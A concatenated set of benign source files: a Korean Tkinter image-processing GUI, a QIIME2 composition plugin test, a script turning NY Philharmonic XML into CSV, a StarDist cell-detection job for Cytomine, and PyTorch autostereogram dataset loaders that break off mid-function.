import threading
import time
def morpFunc():
w1 = 1
w2 = 0
for _ in range(20):
for RGB in range(3) :
for i in range(inImage.H):
for k in range(inImage.W):
newValue = int(inImage.mem[RGB][i][k] * w1 + inImage2.mem[RGB][i][k] * w2)
if newValue > 255:
newValue = 255
elif newValue < 0:
newValue = 0
outImage.mem[RGB][i][k] = newValue
window.outImage = outImage
displayImageColor(window)
w1 -= 0.05;
w2 += 0.05
time.sleep(0.5)
threading.Thread(target=morpFunc).start()
def addSValuePillow(window):
photo = window.photo
inImage = window.inImage
## 중요! 코드. 출력영상 크기 결정 ##
value = askfloat("","0~1~10")
photo2 = photo.copy()
photo2 = ImageEnhance.Color(photo2)
photo2 = photo2.enhance(value)
## 중요! 코드. 출력영상 크기 결정 ##
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
## 임시 출력 --> 원 출력
for i in range(outH):
for k in range(outW):
r, g, b = photo2.getpixel((k, i))
outImage.mem[R][i][k] = r
outImage.mem[G][i][k] = g
outImage.mem[B][i][k] = b
displayImageColor(window)
def addSValueHSV(window):
## 입력 RGB --> 입력 HSV
# 메모리 확보
inImage = window.inImage
inH = inImage.H
inW = inImage.W
inImageHSV = InImage(H=inImage.H, W=inImage.W)
inImageHSV.malloc()
# RGB -> HSV
for i in range(inH):
for k in range(inW):
r, g, b = inImage.mem[R][i][k], inImage.mem[G][i][k], inImage.mem[B][i][k]
h, s, v = colorsys.rgb_to_hsv(r / 255, g / 255, b / 255)
inImageHSV.mem[0][i][k], inImageHSV.mem[1][i][k], inImageHSV.mem[2][i][k] = h, s, v
## 중요! 코드. 출력영상 크기 결정 ##
outH = inH
outW = inW
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
value = askfloat("", "-255~255") # -255 ~ 255
value /= 255
## HSV --> RGB
for i in range(outH):
for k in range(outW):
newS = inImageHSV.mem[1][i][k] + value
if newS < 0 :
newS = 0
elif newS > 1.0 :
newS = 1.0
h, s, v = inImageHSV.mem[0][i][k], newS, inImageHSV.mem[2][i][k]*255
r, g, b = colorsys.hsv_to_rgb(h, s, v)
outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k] = int(r), int(g), int(b)
window.outImage = outImage
displayImageColor(window)
# 이진화 알고리즘
def bwImage(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
## 영상의 평균 구하기.
sumList = []
for RGB in range(3):
sumList.append(0)
for i in range(inImage.H):
for k in range(inImage.W):
sumList[RGB] += inImage.mem[RGB][i][k]
avg = [s // (inImage.W * inImage.H) for s in sumList]
for i in range(inImage.H):
for k in range(inImage.W):
avgVal = int(sum([inImage.mem[tmp][i][k] for tmp in range(3)]) / 3)
if avgVal > avg[RGB]:
newVal = 255
else:
newVal = 0
for RGB in range(3):
outImage.mem[RGB][i][k] = newVal
window.outImage = outImage
displayImageColor(window)
# 영상 축소 알고리즘 (평균변환)
def zoomOutImage2Color(window):
scale = askinteger("축소", "값-->", minvalue=2, maxvalue=16)
inImage = window.inImage
## 중요! 코드. 출력영상 크기 결정 ##
outH = inImage.H//scale
outW = inImage.W//scale
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i//scale][k//scale] += inImage.mem[RGB][i][k]
for i in range(outImage.H):
for k in range(outImage.W):
outImage.mem[RGB][i][k] //= (scale*scale)
window.outImage = outImage
displayImageColor(window)
# 영상 확대 알고리즘 (양선형 보간)
def zoomInImage2Color(window):
scale = askinteger("확대", "값-->", minvalue=2, maxvalue=8)
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H*scale
outW = inImage.W*scale
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
rH, rW, iH, iW = [0] * 4 # 실수위치 및 정수위치
x, y = 0, 0 # 실수와 정수의 차이값
C1,C2,C3,C4 = [0] * 4 # 결정할 위치(N)의 상하좌우 픽셀
for RGB in range(3):
for i in range(outH):
for k in range(outW):
rH = i / scale
rW = k / scale
iH = int(rH)
iW = int(rW)
x = rW - iW
y = rH - iH
if 0 <= iH < inH-1 and 0 <= iW < inW-1 :
C1 = inImage.mem[RGB][iH][iW]
C2 = inImage.mem[RGB][iH][iW+1]
C3 = inImage.mem[RGB][iH+1][iW+1]
C4 = inImage.mem[RGB][iH+1][iW]
newValue = C1*(1-y)*(1-x) + C2*(1-y)* x+ C3*y*x + C4*y*(1-x)
outImage.mem[RGB][i][k] = int(newValue)
window.outImage = outImage
displayImageColor(window)
# 영상 회전 알고리즘
def rotateImageColor(window):
angle = askinteger("회전", "값-->", minvalue=1, maxvalue=360)
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
radian = angle * math.pi / 180
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
xs = i
ys = k
xd = int(math.cos(radian) * xs - math.sin(radian) * ys)
yd = int(math.sin(radian) * xs + math.cos(radian) * ys)
if 0 <= xd < inImage.H and 0 <= yd < inImage.W:
outImage.mem[RGB][xd][yd] = inImage.mem[RGB][i][k]
window.outImage = outImage
displayImageColor(window)
# 영상 회전 알고리즘 - 중심, 역방향
def rotateImage2Color(window):
angle = askinteger("회전", "값-->", minvalue=1, maxvalue=360)
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
radian = angle * math.pi / 180
cx = inW//2
cy = inH//2
for RGB in range(3):
for i in range(outH) :
for k in range(outW) :
xs = i
ys = k
xd = int(math.cos(radian) * (xs-cx) - math.sin(radian) * (ys-cy)) + cx
yd = int(math.sin(radian) * (xs-cx) + math.cos(radian) * (ys-cy)) + cy
if 0 <= xd < outH and 0 <= yd < outW:
outImage.mem[RGB][xs][ys] = inImage.mem[RGB][xd][yd]
else:
outImage.mem[RGB][xs][ys] = 255
window.outImage = outImage
displayImageColor(window)
## 엠보싱 처리
def embossImageRGB(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
MSIZE = 3
mask = [ [-1, 0, 0],
[ 0, 0, 0],
[ 0, 0, 1] ]
## 임시 입력영상 메모리 확보
tmpInImage = InImage(H=inH + MSIZE - 1, W=inW + MSIZE - 1)
tmpInImage.malloc(initValue=127)
tmpOutImage = OutImage(H=outH, W=outW)
tmpOutImage.malloc()
## 원 입력 --> 임시 입력
for RGB in range(3):
for i in range(inH):
for k in range(inW):
tmpInImage.mem[RGB][i+MSIZE//2][k+MSIZE//2] = inImage.mem[RGB][i][k]
## 회선연산
for i in range(MSIZE//2, inH + MSIZE//2):
for k in range(MSIZE//2, inW + MSIZE//2):
# 각 점을 처리.
S = 0.0
for m in range(0, MSIZE):
for n in range(0, MSIZE):
S += mask[m][n]*tmpInImage.mem[RGB][i+m-MSIZE//2][k+n-MSIZE//2]
tmpOutImage.mem[RGB][i-MSIZE//2][k-MSIZE//2] = S
## 127 더하기 (선택)
for i in range(outH):
for k in range(outW):
tmpOutImage.mem[RGB][i][k] += 127
## 임시 출력 --> 원 출력
for i in range(outH):
for k in range(outW):
value = tmpOutImage.mem[RGB][i][k]
if value > 255 :
value = 255
elif value < 0 :
value = 0
outImage.mem[RGB][i][k] = int(value)
window.outImage = outImage
displayImageColor(window)
####################
#### 메인 코드부 ###
####################
if __name__ == "__main__":
win = Window(H=500, W=500)
win.geometry("500x500")
win.title("컴퓨터 비전(딥러닝 기법) ver 0.04")
can = Canvas(win)
win.canvas = can
pap = Paper(can)
can.paper = pap
inImage = InImage()
win.inImage = inImage
outImage = OutImage()
win.outImage = outImage
status = Label(win, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(win)
win.config(menu=mainMenu)
fileMenu = Menu(mainMenu)
mainMenu.add_cascade(label="파일", menu=fileMenu)
fileMenu.add_command(label="파일 열기", command=lambda: openImageColor(win))
fileMenu.add_separator()
fileMenu.add_command(label="파일 저장", command=lambda: saveImageColor(win))
comVisionMenu1 = Menu(mainMenu)
mainMenu.add_cascade(label="화소점 처리", menu=comVisionMenu1)
comVisionMenu1.add_command(label="덧셈/뺄셈", command=lambda: addImageColor(win))
comVisionMenu1.add_command(label="반전하기", command=lambda: revImageColor(win))
comVisionMenu1.add_command(label="파라볼라", command=lambda: paraImageColor(win))
comVisionMenu1.add_separator()
comVisionMenu1.add_command(label="모핑", command=lambda: morphImageColor(win))
comVisionMenu1.add_separator()
comVisionMenu1.add_command(label="채도조절(Pillow)", command=lambda: addSValuePillow(win))
comVisionMenu1.add_command(label="채도조절(HSV)", command=lambda: addSValueHSV(win))
comVisionMenu2 = Menu(mainMenu)
mainMenu.add_cascade(label="통계", menu=comVisionMenu2)
comVisionMenu2.add_command(label="이진화", command=lambda: bwImage(win))
comVisionMenu2.add_command(label="축소(평균변환)", command=lambda: zoomOutImage2Color(win))
comVisionMenu2.add_command(label="확대(양선형보간)", command=lambda: zoomInImage2Color(win))
comVisionMenu2.add_separator()
# comVisionMenu2.add_command(label="히스토그램", command=histoImage)
# comVisionMenu2.add_command(label="히스토그램(내꺼)", command=histoImage2)
# comVisionMenu2.add_command(label="명암대비", command=stretchImage)
# comVisionMenu2.add_command(label="End-In탐색", command=endinImage)
# comVisionMenu2.add_command(label="평활화", command=equalizeImage)
comVisionMenu3 = Menu(mainMenu)
mainMenu.add_cascade(label="기하학 처리", menu=comVisionMenu3)
# comVisionMenu3.add_command(label="상하반전", command=upDownImageColor)
# comVisionMenu3.add_command(label="이동", command=moveImage)
# comVisionMenu3.add_command(label="축소", command=zoomOutImageColor)
# comVisionMenu3.add_command(label="확대", command=zoomInImageColor)
comVisionMenu3.add_command(label="회전1", command=lambda: rotateImageColor(win))
comVisionMenu3.add_command(label="회전2(중심,역방향)", command=lambda: rotateImage2Color(win))
comVisionMenu4 = Menu(mainMenu)
mainMenu.add_cascade(label="화소영역 처리", menu=comVisionMenu4)
comVisionMenu4.add_command(label="엠보싱(RGB)", command=lambda: embossImageRGB(win))
# comVisionMenu4.add_command(label="엠보싱(Pillow제공)", command=embossImagePillow)
# comVisionMenu4.add_command(label="엠보싱(HSV)", command=embossImageHSV)
# comVisionMenu4.add_separator()
# comVisionMenu4.add_command(label="블러링(RGB)", command=blurrImageRGB)
#
# comVisionMenu5 = Menu(mainMenu)
# mainMenu.add_cascade(label="기타 입출력", menu=comVisionMenu5)
# comVisionMenu5.add_command(label="MySQL에서 불러오기", command=loadMysql)
# comVisionMenu5.add_command(label="MySQL에 저장하기", command=saveMysql)
# comVisionMenu5.add_separator()
# comVisionMenu5.add_command(label="CSV 열기", command=openCSV)
# comVisionMenu5.add_command(label="CSV로 저장", command=saveCSV)
# comVisionMenu5.add_separator()
# comVisionMenu5.add_command(label="엑셀 열기", command=openExcel)
# comVisionMenu5.add_command(label="엑셀로 저장", command=saveExcel)
# comVisionMenu5.add_command(label="엑셀 아트로 저장", command=saveExcelArt)
win.mainloop()
``` |
{
"source": "Jiung-Wen/q2-composition",
"score": 2
} |
#### File: q2_composition/tests/test_plugin_setup.py
```python
import unittest
from q2_composition.plugin_setup import plugin as composition_plugin
class PluginSetupTests(unittest.TestCase):
def test_plugin_setup(self):
self.assertEqual(composition_plugin.name, 'composition')
``` |
{
"source": "jiunsiew/NY_Philarchive_performanceHistory",
"score": 3
} |
#### File: NY_Philarchive_performanceHistory/Scripts/transform_xml_to_df.py
```python
from __future__ import division
# from sys import argv
import re
# from collections import Counter
# from sets import Set
# import matplotlib.pyplot as plt
import xml.etree.ElementTree as ET
import os
import os.path
import pandas as pd
os.chdir('/Users/jiun/Documents/analytics/NY_Philarchive_performanceHistory/Programs')
#create xml collection of "docs" (i.e., programs in NYPhil's definition)
tree = ET.parse('complete.xml')
root = tree.getroot()
concerts = root.findall('program')
#convert season listing (e.g., 1842-43) to a single leading year (1842)
def simplify_date(hyphenated_season):
simple_season = re.sub(r'(\d{4})-\d{2}',r'\1',hyphenated_season)
return simple_season
def clean_date(date_string):
tmp = re.search('^\d{4}-\d{2}-\d{2}', date_string)
return date_string[tmp.start():tmp.end()]
#get the composer's last name only from the worksComposerTitle elements
def get_name(work):
composer_name = re.sub(r'(.*?)(,| \[).*',r'\1',work)
composer_name = re.sub(r"(.*)'(.*)",r"\1\\'\2",composer_name)
return composer_name
def extract_text(obj):
if obj is None:
return 'NA'
else:
return obj.text
#gather info from XML file
all_seasons = []
composers = []
current_season = '1842'
total_works = 0
# create a long table with the following columns:
# programID, date,Time, eventType, Location, Venue, composerName, workTitle, conductorName
for c in concerts:
# season = simplify_date(c.find('season').text)
programID = c.find('programID').text
# concert info
concertInfo = c.find('concertInfo')
date = clean_date(concertInfo.find('Date').text)
time = concertInfo.find('Time').text
eventType = concertInfo.find('eventType').text
location = concertInfo.find('Location').text
venue = concertInfo.find('Venue').text
# work info
# stopped here: need to handle the case where there are
workInfo = c.find('worksInfo')
for w in workInfo.findall('work'):
composer = extract_text(w.find('composerName'))
title = extract_text(w.find('workTitle'))
conductor = extract_text(w.find('conductorName'))
row = [programID, date, time, eventType, location, venue, composer, title] #, conductor]
all_seasons.append(row)
# convert to a data frame
output_df = pd.DataFrame(all_seasons,
columns = ['programID',
'date',
'Time',
'eventType',
'Location',
'Venue',
'composerName',
'workTitle'])
output_df.to_csv('NY_Philharmonic_df.csv', sep = '|', encoding = 'utf-8')
``` |
{
"source": "jiunyen-ching/S_CellDetect_Stardist_HE_ROI",
"score": 2
} |
#### File: jiunyen-ching/S_CellDetect_Stardist_HE_ROI/run.py
```python
from __future__ import print_function, unicode_literals, absolute_import, division
import sys
import numpy as np
import os
from shapely.geometry import shape, box, Polygon,Point
from shapely import wkt
from glob import glob
from tifffile import imread
from csbdeep.utils import Path, normalize
from stardist import random_label_cmap
from stardist.models import StarDist2D
from cytomine import cytomine, models, CytomineJob
from cytomine.models import Annotation, AnnotationTerm, AnnotationCollection, ImageInstanceCollection, Job
from PIL import Image
import argparse
import json
import logging
__author__ = "<NAME> <<EMAIL>>"
def main(argv):
with CytomineJob.from_cli(argv) as conn:
conn.job.update(status=Job.RUNNING, progress=0, statusComment="Initialization...")
# base_path = "{}".format(os.getenv("HOME")) # Mandatory for Singularity
base_path = "/home/mmu/Desktop"
working_path = os.path.join(base_path,str(conn.job.id))
#Loading pre-trained Stardist model
np.random.seed(17)
lbl_cmap = random_label_cmap()
#Stardist H&E model downloaded from https://github.com/mpicbg-csbd/stardist/issues/46
#Stardist H&E model downloaded from https://drive.switch.ch/index.php/s/LTYaIud7w6lCyuI
model = StarDist2D(None, name='2D_versatile_HE', basedir='/models/') #use local model file in ~/models/2D_versatile_HE/
#Select images to process
images = ImageInstanceCollection().fetch_with_filter("project", conn.parameters.cytomine_id_project)
list_imgs = []
if conn.parameters.cytomine_id_images == 'all':
for image in images:
list_imgs.append(int(image.id))
else:
list_imgs = [int(id_img) for id_img in conn.parameters.cytomine_id_images.split(',')]
#Go over images
for id_image in conn.monitor(list_imgs, prefix="Running detection on image", period=0.1):
#Dump ROI annotations in img from Cytomine server to local images
#conn.job.update(status=Job.RUNNING, progress=0, statusComment="Fetching ROI annotations...")
roi_annotations = AnnotationCollection()
roi_annotations.project = conn.parameters.cytomine_id_project
roi_annotations.term = conn.parameters.cytomine_id_roi_term
roi_annotations.image = id_image #conn.parameters.cytomine_id_image
roi_annotations.showWKT = True
roi_annotations.fetch()
print(roi_annotations)
#Go over ROI in this image
#for roi in conn.monitor(roi_annotations, prefix="Running detection on ROI", period=0.1):
for roi in roi_annotations:
#Get Cytomine ROI coordinates for remapping to whole-slide
#Cytomine cartesian coordinate system, (0,0) is bottom left corner
print("----------------------------ROI------------------------------")
roi_geometry = wkt.loads(roi.location)
print("ROI Geometry from Shapely: {}".format(roi_geometry))
print("ROI Bounds")
print(roi_geometry.bounds)
minx=roi_geometry.bounds[0]
miny=roi_geometry.bounds[3]
#Dump ROI image into local PNG file
roi_path=os.path.join(working_path,str(roi_annotations.project)+'/'+str(roi_annotations.image)+'/'+str(roi.id))
roi_png_filename=os.path.join(roi_path+'/'+str(roi.id)+'.png')
print("roi_png_filename: %s" %roi_png_filename)
roi.dump(dest_pattern=roi_png_filename,mask=True,alpha=True)
#roi.dump(dest_pattern=os.path.join(roi_path,"{id}.png"), mask=True, alpha=True)
#Stardist works with TIFF images without alpha channel, flattening PNG alpha mask to TIFF RGB
im=Image.open(roi_png_filename)
bg = Image.new("RGB", im.size, (255,255,255))
bg.paste(im,mask=im.split()[3])
roi_tif_filename=os.path.join(roi_path+'/'+str(roi.id)+'.tif')
bg.save(roi_tif_filename,quality=100)
X_files = sorted(glob(roi_path+'/'+str(roi.id)+'*.tif'))
X = list(map(imread,X_files))
n_channel = 3 if X[0].ndim == 3 else X[0].shape[-1]
axis_norm = (0,1) # normalize channels independently (0,1,2) normalize channels jointly
if n_channel > 1:
print("Normalizing image channels %s." % ('jointly' if axis_norm is None or 2 in axis_norm else 'independently'))
#Going over ROI images in ROI directory (in our case: one ROI per directory)
for x in range(0,len(X)):
print("------------------- Processing ROI file %d: %s" %(x,roi_tif_filename))
img = normalize(X[x], conn.parameters.stardist_norm_perc_low, conn.parameters.stardist_norm_perc_high, axis=axis_norm)
#Stardist model prediction with thresholds
labels, details = model.predict_instances(img,
prob_thresh=conn.parameters.stardist_prob_t,
nms_thresh=conn.parameters.stardist_nms_t)
print("Number of detected polygons: %d" %len(details['coord']))
cytomine_annotations = AnnotationCollection()
#Go over detections in this ROI, convert and upload to Cytomine
for pos,polygroup in enumerate(details['coord'],start=1):
#Converting to Shapely annotation
points = list()
for i in range(len(polygroup[0])):
#Cytomine cartesian coordinate system, (0,0) is bottom left corner
#Mapping Stardist polygon detection coordinates to Cytomine ROI in whole slide image
p = Point(minx+polygroup[1][i],miny-polygroup[0][i])
points.append(p)
annotation = Polygon(points)
#Append to Annotation collection
cytomine_annotations.append(Annotation(location=annotation.wkt,
id_image=id_image,#conn.parameters.cytomine_id_image,
id_project=conn.parameters.cytomine_id_project,
id_terms=[conn.parameters.cytomine_id_cell_term]))
print(".",end = '',flush=True)
#Send Annotation Collection (for this ROI) to Cytomine server in one http request
ca = cytomine_annotations.save()
conn.job.update(status=Job.TERMINATED, progress=100, statusComment="Finished.")
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "jiupinjia/neural-magic-eye",
"score": 2
} |
#### File: jiupinjia/neural-magic-eye/datasets.py
```python
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
import glob
import random
import stereogram as stgm
import utils
import torch
import torchvision.transforms.functional as TF
from torch.utils.data import Dataset, DataLoader, Subset
from torchvision.datasets import MNIST
import string
import qrcode
class DataAugmentation:
def __init__(self,
with_random_hflip=False,
with_random_vflip=False,
with_random_blur=False,
with_random_rotate=False,
with_random_crop=False,
with_random_aspect_ratio=False,
with_random_jpeg_compression=False):
self.with_random_hflip = with_random_hflip
self.with_random_vflip = with_random_vflip
self.with_random_blur = with_random_blur
self.with_random_rotate = with_random_rotate
self.with_random_crop = with_random_crop
self.with_random_aspect_ratio = with_random_aspect_ratio
self.with_random_jpeg_compression = with_random_jpeg_compression
def transform(self, img):
h, w = img.shape[0:2]
if self.with_random_hflip and random.random() > 0.5:
img = img[:, ::-1]
if self.with_random_vflip and random.random() > 0.5:
img = img[::-1, :]
if self.with_random_blur and random.random() > 0.5:
k = random.randint(1, int(min(h, w)/20 + 1))
img = cv2.blur(img, (k, k))
if self.with_random_rotate and random.random() > 0.5:
theta = random.uniform(-180, 180)
image_center = tuple(np.array(img.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, theta, 1.0)
img = cv2.warpAffine(img, rot_mat, img.shape[1::-1], flags=cv2.INTER_LINEAR)
if self.with_random_crop and random.random() > 0.5:
crop_h = random.uniform(h/2, h)
crop_w = random.uniform(w/2, w)
y1 = int(random.uniform(0, h-crop_h))
y2 = int(y1 + crop_h)
x1 = int(random.uniform(0, w-crop_w))
x2 = int(x1 + crop_w)
img = img[y1:y2, x1:x2]
if self.with_random_aspect_ratio and random.random() > 0.5:
target_aspect_ratio = random.uniform(3, 12)
h_new = h
w_new = int(h_new / target_aspect_ratio)
img = cv2.resize(img, (w_new, h_new), cv2.INTER_CUBIC)
if self.with_random_jpeg_compression and random.random() > 0.5:
img = (img * 255.).astype(np.uint8)
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), random.randint(20, 90)]
_, imgcode = cv2.imencode('.jpg', img, encode_param)
img = cv2.imdecode(imgcode, cv2.IMREAD_COLOR)
img = img.astype(np.float32) / 255.
return img
class SimpleMNISTDataset(Dataset):
def __init__(self, bg_tile_dir, img_size, is_train=True):
self.img_size = img_size
self.synthesizer = stgm.Stereogram(CANVAS_HEIGHT=img_size)
self.is_train = is_train
_ = MNIST(root=r'./datasets', train=True, download=True)
mnist_training_imgs, mnist_training_labels = torch.load(r'./datasets/MNIST/processed/training.pt')
mnist_testing_imgs, mnist_testing_labels = torch.load(r'./datasets/MNIST/processed/test.pt')
if is_train:
self.bg_tiles_dirs = glob.glob(os.path.join(bg_tile_dir, 'train', '*.jpg'))
self.mnist_imgs = np.array(mnist_training_imgs, dtype=np.float32) / 255.
self.mnist_labels = np.array(mnist_training_labels, dtype=np.int)
self.tile_augmenter = DataAugmentation(
with_random_vflip=True, with_random_hflip=True, with_random_blur=True)
self.dmap_augmenter = DataAugmentation(with_random_blur=True)
else:
self.bg_tiles_dirs = glob.glob(os.path.join(bg_tile_dir, 'val', '*.jpg'))
self.mnist_imgs = np.array(mnist_testing_imgs, dtype=np.float32) / 255.
self.mnist_labels = np.array(mnist_testing_labels, dtype=np.int)
self.tile_augmenter = DataAugmentation()
self.dmap_augmenter = DataAugmentation()
def __len__(self):
return len(self.mnist_labels)
def __getitem__(self, idx):
dmap = np.reshape(self.mnist_imgs[idx, :], [28, 28])
label = self.mnist_labels[idx]
idx = random.randint(0, len(self.bg_tiles_dirs) - 1)
bg_tile = cv2.imread(self.bg_tiles_dirs[idx], cv2.IMREAD_COLOR)
bg_tile = cv2.cvtColor(bg_tile, cv2.COLOR_BGR2RGB) / 255.
bg_tile = self.tile_augmenter.transform(bg_tile)
dmap = self.dmap_augmenter.transform(dmap)
bg_tile, dmap = self.synthesizer.normalize_height(bg_tile, dmap)
stereogram = self.synthesizer.synthesis(bg_tile, dmap)
# resize and to tensor
stereogram = cv2.resize(stereogram, (self.img_size, self.img_size), cv2.INTER_CUBIC)
dmap = cv2.resize(dmap, (self.img_size, self.img_size), cv2.INTER_CUBIC)
stereogram = TF.to_tensor(np.array(stereogram, dtype=np.float32))
dmap = TF.to_tensor(np.array(dmap, dtype=np.float32))
label = torch.tensor(label, dtype=torch.int)
data = {'stereogram': stereogram, 'dmap': dmap, 'label': label}
return data
class ShapeNetDataset(Dataset):
def __init__(self, depth_map_dir, bg_tile_dir, img_size, is_train=True):
self.img_size = img_size
self.is_train = is_train
if is_train:
self.bg_tiles_dirs = glob.glob(os.path.join(bg_tile_dir, 'train', '*.jpg'))
self.depth_map_files = np.loadtxt(os.path.join(depth_map_dir, 'train.txt'), dtype=np.str, delimiter=',')
self.tile_augmenter = DataAugmentation(
with_random_vflip=True, with_random_hflip=True,
with_random_blur=True, with_random_aspect_ratio=True)
self.dmap_augmenter = DataAugmentation(
with_random_vflip=True, with_random_hflip=True,
with_random_rotate=True, with_random_crop=True)
self.stereogram_augmenter = DataAugmentation(with_random_jpeg_compression=True)
else:
self.bg_tiles_dirs = glob.glob(os.path.join(bg_tile_dir, 'val', '*.jpg'))
self.depth_map_files = np.loadtxt(os.path.join(depth_map_dir, 'val.txt'), dtype=np.str, delimiter=',')
self.tile_augmenter = DataAugmentation()
self.dmap_augmenter = DataAugmentation()
self.stereogram_augmenter = DataAugmentation()
self.labels = self.depth_map_files[:, 2].astype(int)
def __len__(self):
return self.depth_map_files.shape[0]
def __getitem__(self, idx):
# why CANVAS_HEIGHT is set larger than in_size?
# We want to simulate the degradation of image resize at inference time
canvas_height = int(self.img_size*random.uniform(1.0, 1.5))
synthesizer = stgm.Stereogram(CANVAS_HEIGHT=canvas_height)
dmap = cv2.imread(self.depth_map_files[idx, 0], cv2.IMREAD_GRAYSCALE)
dmap = dmap.astype(np.float32) / 255.
label = self.labels[idx]
idx = random.randint(0, len(self.bg_tiles_dirs) - 1)
bg_tile = cv2.imread(self.bg_tiles_dirs[idx], cv2.IMREAD_COLOR)
bg_tile = cv2.cvtColor(bg_tile, cv2.COLOR_BGR2RGB) / 255.
bg_tile = self.tile_augmenter.transform(bg_tile)
dmap = self.dmap_augmenter.transform(dmap)
bg_tile, dmap = synthesizer.normalize_height(bg_tile, dmap)
stereogram = synthesizer.synthesis(bg_tile, dmap)
stereogram = self.stereogram_augmenter.transform(stereogram)
# resize and to tensor
stereogram = cv2.resize(stereogram, (self.img_size, self.img_size), cv2.INTER_CUBIC)
dmap = cv2.resize(dmap, (self.img_size, self.img_size), cv2.INTER_CUBIC)
stereogram = TF.to_tensor(np.array(stereogram, dtype=np.float32))
dmap = TF.to_tensor(np.array(dmap, dtype=np.float32))
label = torch.tensor(label, dtype=torch.int)
data = {'stereogram': stereogram, 'dmap': dmap, 'label': label}
return data
class WatermarkingDataset(Dataset):
def __init__(self, base_canvas_dir, img_size, is_train=True):
# we use fixed texture to generate autostereogram for both training and testing
self.bg_tile = cv2.imread(r'./datasets/Textures/train/00099.jpg', cv2.IMREAD_COLOR)
self.bg_tile = cv2.cvtColor(self.bg_tile, cv2.COLOR_BGR2RGB).astype(np.float32) / 255.
self.is_train = is_train
if is_train:
self.canvas_dir = glob.glob(os.path.join(base_canvas_dir, 'train', '*.jpg'))
self.canvas_augmenter = DataAugmentation(with_random_hflip=True, with_random_crop=True, with_random_blur=True)
else:
self.canvas_dir = glob.glob(os.path.join(base_canvas_dir, 'val', '*.jpg'))
self.canvas_augmenter = DataAugmentation()
self.img_size = img_size
def __len__(self):
if self.is_train:
return 50000
else:
return 5000
def __getitem__(self, idx):
# why CANVAS_HEIGHT is set larger than in_size?
# We want to simulate the degradation of image resize at inference time
canvas_height = int(self.img_size*random.uniform(1.0, 1.5))
synthesizer = stgm.Stereogram(CANVAS_HEIGHT=canvas_height)
idx = random.randint(0, len(self.canvas_dir) - 1)
canvas = cv2.imread(self.canvas_dir[idx], cv2.IMREAD_COLOR)
canvas = cv2.cvtColor(canvas, cv2.COLOR_BGR2RGB).astype(np.float32) / 255.
canvas = self.canvas_augmenter.transform(canvas)
characters = string.ascii_letters
length = random.randint(1, 50)
random_str = ''.join([random.choice(characters) for j in range(length)])
dmap = qrcode.make(random_str)
dmap = 1 - np.array(dmap, np.float32)
bg_tile, dmap = synthesizer.normalize_height(self.bg_tile, dmap)
stereogram = synthesizer.synthesis(bg_tile, dmap)
# resize
stereogram = cv2.resize(stereogram, (self.img_size, self.img_size), cv2.INTER_CUBIC)
dmap = cv2.resize(dmap, (self.img_size, self.img_size), cv2.INTER_CUBIC)
canvas = cv2.resize(canvas, (self.img_size, self.img_size), cv2.INTER_CUBIC)
alpha = random.uniform(0.1, 0.9)
mix = alpha * stereogram + (1 - alpha) * canvas
dmap = TF.to_tensor(np.array(dmap, dtype=np.float32))
mix = TF.to_tensor(np.array(mix, dtype=np.float32))
data = {'stereogram': mix, 'dmap': dmap}
return data
def get_loaders(args):
if args.dataset == 'mnist':
training_set = SimpleMNISTDataset(
bg_tile_dir=r'./datasets/Textures', img_size=args.in_size, is_train=True)
val_set = SimpleMNISTDataset(
bg_tile_dir=r'./datasets/Textures', img_size=args.in_size, is_train=False)
elif args.dataset == 'shapenet':
training_set = ShapeNetDataset(
depth_map_dir=r'./datasets/ShapeNetCore.v2', bg_tile_dir=r'./datasets/Textures',
img_size=args.in_size, is_train=True)
val_set = ShapeNetDataset(
depth_map_dir=r'./datasets/ShapeNetCore.v2', bg_tile_dir=r'./datasets/Textures',
img_size=args.in_size, is_train=False)
elif args.dataset == 'watermarking':
training_set = WatermarkingDataset(
base_canvas_dir=r'./datasets/VGGFlowers', img_size=args.in_size, is_train=True)
val_set = WatermarkingDataset(
base_canvas_dir=r'./datasets/VGGFlowers', img_size=args.in_size, is_train=False)
else:
raise NotImplementedError(
'Wrong dataset name %s (choose one from [maps, flowers, facades])'
% args.dataset)
datasets = {'train': training_set, 'val': val_set}
dataloaders = {x: DataLoader(datasets[x], batch_size=args.batch_size,
shuffle=True, num_workers=4)
for x in ['train', 'val']}
return dataloaders
```
#### File: jiupinjia/neural-magic-eye/utils.py
```python
import numpy as np
import matplotlib.pyplot as plt
import cv2
import random
from skimage import measure
import torch
from torchvision import utils
def make_numpy_grid(tensor_data):
# tensor_data: b x c x h x w, [0, 1], tensor
